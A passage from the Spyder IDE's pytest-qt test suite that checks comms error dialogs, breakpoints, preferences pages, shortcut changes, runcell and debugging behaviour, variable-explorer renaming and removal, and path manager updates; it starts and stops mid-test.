"""Test if a comms error is correctly displayed."""
CONF.set('main', 'show_internal_errors', True)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a bogus get_cwd
with qtbot.waitSignal(shell.executed):
shell.execute('def get_cwd(): import foo')
with qtbot.waitSignal(shell.executed):
shell.execute("get_ipython().kernel.frontend_comm."
"register_call_handler('get_cwd', get_cwd)")
with qtbot.waitSignal(shell.executed, timeout=3000):
shell.execute('ls')
qtbot.waitUntil(lambda: main_window.console.error_dialog is not None,
timeout=EVAL_TIMEOUT)
error_dialog = main_window.console.error_dialog
assert 'Exception in comms call get_cwd' in error_dialog.error_traceback
assert 'No module named' in error_dialog.error_traceback
main_window.console.close_error_dialog()
CONF.set('main', 'show_internal_errors', False)
@pytest.mark.slow
@flaky(max_runs=3)
def test_break_while_running(main_window, qtbot, tmpdir):
"""Test that we can set breakpoints while running."""
# Create loop
code = ("import time\n"
"for i in range(100):\n"
" print(i)\n"
" time.sleep(0.1)\n"
)
p = tmpdir.join("loop_script.py")
p.write(code)
test_file = to_text_string(p)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Load test file
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Continue debugging
qtbot.keyClicks(shell._control, '!c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.wait(500)
with qtbot.waitSignal(shell.executed):
# Set a breakpoint
code_editor.debugger.toogle_breakpoint(line_number=3)
# We should drop into the debugger
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(shell._control, '!q')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# --- Preferences
# ----------------------------------------------------------------------------
def preferences_dialog_helper(qtbot, main_window, section):
"""
Open preferences dialog and select page with `section` (CONF_SECTION).
"""
main_window.show_preferences()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is not None,
timeout=5000)
dlg = container.dialog
index = dlg.get_index_by_name(section)
page = dlg.get_page(index)
dlg.set_current_index(index)
return dlg, index, page
@pytest.mark.slow
def test_preferences_run_section_exists(main_window, qtbot):
"""
Test for spyder-ide/spyder#13524 regression.
Ensure the Run section exists.
"""
assert preferences_dialog_helper(qtbot, main_window, 'run')
@pytest.mark.slow
def test_preferences_checkboxes_not_checked_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#10139 regression.
    Enabling codestyle/docstyle in the completion section of Preferences
    was not updating the corresponding options correctly.
"""
# Reset config
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pydocstyle'),
False)
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pycodestyle'),
False)
    # Open completion preferences and update options
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'completions')
# Get the correct tab pages inside the Completion preferences page
tnames = [page.tabs.tabText(i).lower() for i in range(page.tabs.count())]
tabs = [(page.tabs.widget(i).layout().itemAt(0).widget(), i)
for i in range(page.tabs.count())]
tabs = dict(zip(tnames, tabs))
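    # Map each relevant tab name to the attribute name of the checkbox that
    # enables the corresponding option on that tab.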
tab_widgets = {
'code style and formatting': 'code_style_check',
'docstring style': 'docstring_style_check'
}
for tabname in tab_widgets:
tab, idx = tabs[tabname]
check_name = tab_widgets[tabname]
check = getattr(tab, check_name)
page.tabs.setCurrentIndex(idx)
check.animateClick()
qtbot.wait(500)
dlg.ok_btn.animateClick()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
# Check the menus are correctly updated
count = 0
for menu_item in main_window.source_menu_actions:
if menu_item and isinstance(menu_item, QAction):
print(menu_item.text(), menu_item.isChecked())
if 'code style' in menu_item.text():
assert menu_item.isChecked()
count += 1
elif 'docstring style' in menu_item.text():
assert menu_item.isChecked()
count += 1
assert count == 2
# Reset config
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pydocstyle'),
False)
CONF.set('completions',
('provider_configuration', 'lsp', 'values', 'pycodestyle'),
False)
@pytest.mark.slow
def test_preferences_change_font_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#10284 regression.
    Changing the font resulted in an error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'appearance')
for fontbox in [page.plain_text_font.fontbox,
page.rich_text_font.fontbox]:
fontbox.setFocus()
idx = fontbox.currentIndex()
fontbox.setCurrentIndex(idx + 1)
dlg.ok_btn.animateClick()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
@pytest.mark.slow
@pytest.mark.skipif(
not sys.platform.startswith('linux'),
reason="Changes of Shitf+Return shortcut cause an ambiguous shortcut")
def test_preferences_empty_shortcut_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#12992 regression.
    Overwriting shortcuts resulted in a shortcut conflict.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
    # Set up shortcuts (assign the 'run cell and advance' shortcut to 'run selection')
base_run_cell_advance = CONF.get_shortcut(
'editor', 'run cell and advance') # Should be Shift+Return
base_run_selection = CONF.get_shortcut(
'editor', 'run selection') # Should be F9
assert base_run_cell_advance == 'Shift+Return'
assert base_run_selection == 'F9'
CONF.set_shortcut(
'editor', 'run cell and advance', '')
CONF.set_shortcut(
'editor', 'run selection', base_run_cell_advance)
main_window.shortcuts.apply_shortcuts()
# Check execution of shortcut
# Create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(u'print(0)\nprint(ññ)')
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: u'print(0)' in shell._control.toPlainText())
assert u'ññ' not in shell._control.toPlainText()
# Reset shortcuts
CONF.set_shortcut(
'editor', 'run selection', 'F9')
CONF.set_shortcut(
'editor', 'run cell and advance', 'Shift+Return')
main_window.shortcuts.apply_shortcuts()
qtbot.wait(500) # Wait for shortcut change to actually be applied
# Check shortcut run cell and advance reset
code_editor.setFocus()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(lambda: 'runcell(0' in shell._control.toPlainText())
@pytest.mark.slow
def test_preferences_shortcut_reset_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#11132 regression.
    Resetting shortcuts resulted in an error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'shortcuts')
page.reset_to_default(force=True)
dlg.ok_btn.animateClick()
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
@pytest.mark.slow
@pytest.mark.order(1)
def test_preferences_change_interpreter(qtbot, main_window):
"""Test that on main interpreter change signal is emitted."""
# Check original pyls configuration
lsp = main_window.completions.get_provider('lsp')
config = lsp.generate_python_config()
jedi = config['configurations']['pylsp']['plugins']['jedi']
assert jedi['environment'] is None
assert jedi['extra_paths'] == []
# Change main interpreter on preferences
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
page.cus_exec_radio.setChecked(True)
page.cus_exec_combo.combobox.setCurrentText(sys.executable)
with qtbot.waitSignal(main_window.sig_main_interpreter_changed,
timeout=5000, raising=True):
dlg.ok_btn.animateClick()
# Check updated pyls configuration
config = lsp.generate_python_config()
jedi = config['configurations']['pylsp']['plugins']['jedi']
assert jedi['environment'] == sys.executable
assert jedi['extra_paths'] == []
@pytest.mark.slow
def test_preferences_last_page_is_loaded(qtbot, main_window):
    # Test that the last visited page is selected again when the dialog is reopened
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
preferences = main_window.preferences
container = preferences.get_container()
qtbot.waitUntil(lambda: container.dialog is not None,
timeout=5000)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
main_window.show_preferences()
qtbot.waitUntil(lambda: container.dialog is not None,
timeout=5000)
dlg = container.dialog
assert dlg.get_current_index() == index
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: container.dialog is None,
timeout=5000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
def test_go_to_definition(main_window, qtbot, capsys):
"""Test that go-to-definition works as expected."""
# --- Code that gives no definition
code_no_def = dedent("""
from qtpy.QtCore import Qt
Qt.FramelessWindowHint""")
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_no_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to
# FramelessWindowHint
code_editor.move_cursor(-1)
with qtbot.waitSignal(
code_editor.completions_response_signal):
code_editor.go_to_definition_from_cursor()
# Capture stderr and assert there are no errors
sys_stream = capsys.readouterr()
assert sys_stream.err == u''
# --- Code that gives definition
code_def = "import qtpy.QtCore"
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to QtCore
code_editor.move_cursor(-1)
with qtbot.waitSignal(
code_editor.completions_response_signal):
code_editor.go_to_definition_from_cursor()
def _get_filenames():
return [osp.basename(f) for f in main_window.editor.get_filenames()]
qtbot.waitUntil(lambda: 'QtCore.py' in _get_filenames())
assert 'QtCore.py' in _get_filenames()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin' and not PY2,
reason="It times out on macOS/PY3")
def test_debug_unsaved_file(main_window, qtbot):
"""Test that we can debug an unsaved file."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text('print(0)\nprint(1)\nprint(2)')
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=2)
qtbot.wait(500)
# Start debugging
qtbot.mouseClick(debug_button, Qt.LeftButton)
# There is a breakpoint, so it should continue
qtbot.waitUntil(
lambda: '!continue' in shell._control.toPlainText())
qtbot.waitUntil(
lambda: "1---> 2 print(1)" in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [True, False])
def test_runcell(main_window, qtbot, tmpdir, debug):
"""Test the runcell command."""
# Write code with a cell to a file
code = u"result = 10; fname = __file__"
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
if debug:
function = 'debugcell'
else:
function = 'runcell'
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute(function + u"(0, r'{}')".format(to_text_string(p)))
if debug:
        # Continue execution so the cell runs to completion
shell.pdb_execute('!c')
qtbot.wait(1000)
# Verify that the `result` variable is defined
assert shell.get_value('result') == 10
# Verify that the `fname` variable is `cell-test.py`
assert "cell-test.py" in shell.get_value('fname')
# Verify that the `__file__` variable is undefined
try:
shell.get_value('__file__')
assert False
except KeyError:
pass
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_leading_indent(main_window, qtbot, tmpdir):
"""Test the runcell command with leading indent."""
# Write code with a cell to a file
code = ("def a():\n return\nif __name__ == '__main__':\n"
"# %%\n print(1233 + 1)\n")
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(1, r'{}')".format(to_text_string(p)))
assert "1234" in shell._control.toPlainText()
assert "This is not valid Python code" not in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_rename(main_window, qtbot, tmpdir):
"""
Test renaming a variable.
Regression test for spyder-ide/spyder#10735
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_rename").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Rename one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.rename_item(new_name='arr2')
# Wait until all objects have updated in the variable explorer
def data(cm, i, j):
return cm.data(cm.index(i, j))
qtbot.waitUntil(lambda: data(nsb.editor.model, 1, 0) == 'arr2',
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr2'
assert data(nsb.editor.model, 2, 0) == 'li'
assert data(nsb.editor.model, 3, 0) == 's'
# ---- Run file again ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 5,
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr'
assert data(nsb.editor.model, 2, 0) == 'arr2'
assert data(nsb.editor.model, 3, 0) == 'li'
assert data(nsb.editor.model, 4, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_remove(main_window, qtbot, tmpdir):
"""
Test removing a variable.
Regression test for spyder-ide/spyder#10709
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_remove").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Remove one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.remove_item(force=True)
    # Wait until the object has been removed from the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 3,
timeout=EVAL_TIMEOUT)
def data(cm, i, j):
assert cm.rowCount() == 3
return cm.data(cm.index(i, j))
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'li'
assert data(nsb.editor.model, 2, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_refresh(main_window, qtbot):
"""
Test refreshing the variable explorer while the kernel is executing.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
control = main_window.ipyconsole.get_widget().get_focus_widget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
shell.execute("import time\n"
"for i in range(10):\n"
" print('i = {}'.format(i))\n"
" time.sleep(.1)\n")
qtbot.waitUntil(lambda: "i = 0" in control.toPlainText())
qtbot.wait(300)
# Get value object
nsb = main_window.variableexplorer.current_widget()
# This is empty
assert len(nsb.editor.source_model._data) == 0
nsb.refresh_table()
qtbot.waitUntil(lambda: len(nsb.editor.source_model._data) == 1)
assert 0 < int(nsb.editor.source_model._data['i']['view']) < 9
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_runcell_edge_cases(main_window, qtbot, tmpdir):
"""
Test if runcell works with an unnamed cell at the top of the file
and with an empty cell.
"""
# Write code with a cell to a file
code = ('if True:\n'
' a = 1\n'
'#%%')
p = tmpdir.join("test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
code_editor = main_window.editor.get_focus_widget()
# call runcell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(1000)
assert 'runcell(0' in shell._control.toPlainText()
assert 'cell is empty' not in shell._control.toPlainText()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert 'runcell(1' in shell._control.toPlainText()
assert 'Error' not in shell._control.toPlainText()
assert 'cell is empty' in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_pdb(main_window, qtbot):
"""Test the runcell command in pdb."""
# Write code with a cell to a file
code = ("if 'abba' in dir():\n"
" print('abba {}'.format(abba))\n"
"else:\n"
" def foo():\n"
" abba = 27\n"
" foo()\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Start debugging
with qtbot.waitSignal(shell.executed, timeout=10000):
qtbot.mouseClick(debug_button, Qt.LeftButton)
for key in ['!n', '!n', '!s', '!n', '!n']:
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(shell._control, key)
qtbot.keyClick(shell._control, Qt.Key_Enter)
assert shell.get_value('abba') == 27
code_editor.setFocus()
# call runcell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert "runcell" in shell._control.toPlainText()
# Make sure the local variables are detected
assert "abba 27" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [False, True])
def test_runcell_cache(main_window, qtbot, debug):
"""Test the runcell command cache."""
# Write code with a cell to a file
code = ("import time\n"
"time.sleep(.5)\n"
"# %%\n"
"print('Done')\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
if debug:
# Start debugging
with qtbot.waitSignal(shell.executed):
shell.execute("%debug print()")
# Run the two cells
code_editor.setFocus()
code_editor.move_cursor(0)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(100)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.waitUntil(lambda: "Done" in shell._control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Works reliably on Linux")
def test_path_manager_updates_clients(qtbot, main_window, tmpdir):
"""Check that on path manager updates, consoles correctly update."""
main_window.show_path_manager()
dlg = main_window._path_manager
test_folder = 'foo-spam-bar-123'
folder = str(tmpdir.mkdir(test_folder))
dlg.add_path(folder)
qtbot.waitUntil(lambda: dlg.button_ok.isEnabled(), timeout=EVAL_TIMEOUT)
with qtbot.waitSignal(dlg.sig_path_changed, timeout=EVAL_TIMEOUT):
dlg.button_ok.animateClick()
cmd = 'import sys;print(sys.path)'
# Check Spyder is updated
main_window.console.execute_lines(cmd)
syspath = main_window.console.get_sys_path()
assert folder in syspath
# Check clients are updated
count = 0
for client in main_window.ipyconsole.get_clients():
shell = client.shellwidget
if shell is not None:
syspath = shell.execute(cmd)
control = shell._control
# `shell.executed` signal was not working so we use waitUntil
qtbot.waitUntil(lambda: 'In [2]:' in control.toPlainText(),
timeout=EVAL_TIMEOUT)
assert test_folder in control.toPlainText()
count += 1
assert count >= 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It times out on macOS and Windows")
def test_pdb_key_leak(main_window, qtbot, tmpdir):
"""
    Check that pdb notifications to Spyder don't call
    QApplication.processEvents(). If they do, there might be keystroke leakage.
    See #10834
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
assert '1/0' in control.toPlainText()
# Replace QApplication.processEvents to make sure it is not called
super_processEvents = QApplication.processEvents
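    # Monkeypatch processEvents with a wrapper that records whether it is
    # called; the original function is restored in the finally block below.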
def processEvents():
processEvents.called = True
return super_processEvents()
processEvents.called = False
try:
QApplication.processEvents = processEvents
# Debug and open both files
with qtbot.waitSignal(shell.executed):
shell.execute('%debug')
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!u')
qtbot.keyClick(control, Qt.Key_Enter)
# Wait until both files are open
qtbot.waitUntil(
lambda: osp.normpath(str(test_file)) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
qtbot.waitUntil(
lambda: str(test_file2) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
# Make sure the events are not processed.
assert not processEvents.called
finally:
QApplication.processEvents = super_processEvents
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It times out on macOS")
@pytest.mark.parametrize(
"where", [True, False])
def test_pdb_step(main_window, qtbot, tmpdir, where):
"""
    Check that pdb only makes Spyder's editor move when a new line is reached.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
qtbot.wait(1000)
assert '1/0' in control.toPlainText()
# Debug and enter first file
with qtbot.waitSignal(shell.executed):
shell.execute('%debug')
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file)))
# Move to another file
main_window.editor.new()
qtbot.wait(100)
assert main_window.editor.get_current_editor().filename != str(test_file)
current_filename = main_window.editor.get_current_editor().filename
# Run a random command, make sure we don't move
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!a')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
assert current_filename == main_window.editor.get_current_editor().filename
# Go up and enter second file
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!u')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2)))
# Go back to first file
editor_stack = main_window.editor.get_current_editorstack()
index = editor_stack.has_filename(str(test_file))
assert index is not None
editor_stack.set_stack_index(index)
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
if where:
# go back to the second file with where
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!w')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Make sure we moved
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2))
else:
# Stay at the same place
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!a')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Make sure we didn't move
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Fails sometimes on macOS")
def test_runcell_after_restart(main_window, qtbot):
"""Test runcell after a kernel restart."""
# Write code to a file
code = "print('test_runcell_after_restart')"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# call runcell
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(
lambda: "test_runcell_after_restart" in shell._control.toPlainText())
# Make sure no errors are shown
assert "error" not in shell._control.toPlainText().lower()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="It fails sometimes on Linux")
@pytest.mark.parametrize(
"ipython", [True, False])
@pytest.mark.parametrize(
"test_cell_magic", [True, False])
def test_ipython_magic(main_window, qtbot, tmpdir, ipython, test_cell_magic):
"""Test the runcell command with cell magic."""
# Write code with a cell to a file
write_file = tmpdir.mkdir("foo").join("bar.txt")
assert not osp.exists(to_text_string(write_file))
if test_cell_magic:
code = "\n\n%%writefile " + to_text_string(write_file) + "\ntest\n"
else:
code = "\n\n%debug print()"
if ipython:
fn = "cell-test.ipy"
else:
fn = "cell-test.py"
p = tmpdir.join(fn)
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(0, r'{}')".format(to_text_string(p)))
control = main_window.ipyconsole.get_widget().get_focus_widget()
error_text = 'save this file with the .ipy extension'
try:
if ipython:
if test_cell_magic:
qtbot.waitUntil(
lambda: 'Writing' in control.toPlainText())
# Verify that the code was executed
assert osp.exists(to_text_string(write_file))
else:
qtbot.waitSignal(shell.executed)
assert error_text not in control.toPlainText()
else:
qtbot.waitUntil(lambda: error_text in control.toPlainText())
finally:
if osp.exists(to_text_string(write_file)):
os.remove(to_text_string(write_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_running_namespace(main_window, qtbot, tmpdir):
"""
Test that the running namespace is correctly sent when debugging in a
new namespace.
"""
code = ("def test(a):\n print('a:',a)\na = 10\ntest(5)")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=2)
# Write b in the namespace
with qtbot.waitSignal(shell.executed):
shell.execute('b = 10')
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['b']['view'] == '10'
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# b should not be there (running namespace) and the local a should be 5
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data and
nsb.editor.source_model._data['a']['view'] == '5',
timeout=3000)
assert 'b' not in nsb.editor.source_model._data
assert nsb.editor.source_model._data['a']['view'] == '5'
qtbot.waitUntil(shell.is_waiting_pdb_input)
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!c')
# At the end, b should be back and a should be 10
